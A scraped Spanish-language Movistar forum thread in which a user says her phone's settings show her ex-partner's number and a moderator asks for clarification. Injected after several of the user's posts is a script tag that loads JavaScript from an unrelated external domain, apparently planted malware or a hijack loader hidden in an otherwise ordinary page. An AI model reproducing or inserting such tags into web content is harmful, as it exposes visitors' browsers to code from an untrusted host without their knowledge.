Comunidad Movistar

Responder
Usuario Senior
ElisabethGarciaPardo
Mensajes publicados: 3
0

NUMERO DEL TELEFONO

[ Editado ]

Buenas..mi consulta es la siguiente,intentare explicarlo lo mejor q pueda:
Hace 5 años..mi ex me regalo un movil..cn la tarjeta q tengo ahora..el movil aquel no lo tengo,la tarjeta si..soy de contrato..y la cuestion es la siguiente tengo un LG-P360,cuando voy AJUSTES-ACERCA DEL TELEFONO-ESTADO..dnd pone Mi numero de telefono sale el siguiente: XXXXXXXX(q del cual este es de mi ex..)entonces cuando alguien me busca o sincroniza contactos les sale este en vez del mio..He cambiado el numero en Facebook..en Gmail..ya nose q hacer..he de cambiarme el mi numero (real)..

<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.2823211817117045"></script>

Usuario Senior
ElisabethGarciaPardo
0

Re: NUMERO DEL TELEFONO

MUCHAS GRACIAS X DECIR ALGO..  :womansad:

<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.051979921904895976"></script>
Antiguo Moderador
Mery-Movistar
Mensajes publicados: 3.625
0

Hola ElisabethGarciaPardo:

En primer lugar, comentarte que hemos editado tu mensaje ya que no está permitida la publicación de datos personales a través del foro.

Respecto a tu incidencia, no entiendo muy bien lo que comentas ni cual es en si el problema.

Entiendo que ese terminal se usaba anteriormente con el número que has publicado y es ese el que se ha quedado registrado en los ajustes del teléfono, ¿pero no te permite editarlo y cambiarlo por otro?

El que aparezca tu teléfono  en los ajustes del terminal no implica que sea visible para nadie, ¿a qué te refieres con cuando alguien te busca o sincroniza? a través de donde?

Si nos puede explicar un poco más...

______________________________________________________________________________________________________
Si necesitas Asistencia Técnica contacta con el 900124455, o rellena este formulario, o consulta nuestro Asistente Virtual
Usuario Senior
ElisabethGarciaPardo
0

Me refiero al whats'app.No no me permite editarlo.
El problema en si es..q en el telefono en ajustes no aparece el mio sino el de otro..

<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.8947559187103502"></script>
Antiguo Moderador
Mery-Movistar
Mensajes publicados: 3.625
0

Sigo sin entenderte.

¿Qúe te pasa concretamente con  el whatsapp? es ahí donde ves el número de la otra persona?

Cuando me vuelves a indicar que en ajustes del teléfono es donde no aparece el tuyo entiendo que te refieres a la ruta que comentabas en el primer mensaje.   Si es así, te repito las mismas preguntas que en el mensaje anterior, ese número no es visible para nadie y no afecta al funcionamiento de ninguna aplicación ¿cual es el problema? ¿donde lo ven tus contactos?

Con lo que comentas en tu primer mensaje das a entender que el teléfono es "nuevo" o al menos no ha sido utilizado por el número de teléfono que aparece en los ajustes, ¿es así o esa línea ha hecho uso de este terminal?

______________________________________________________________________________________________________
Si necesitas Asistencia Técnica contacta con el 900124455, o rellena este formulario, o consulta nuestro Asistente Virtual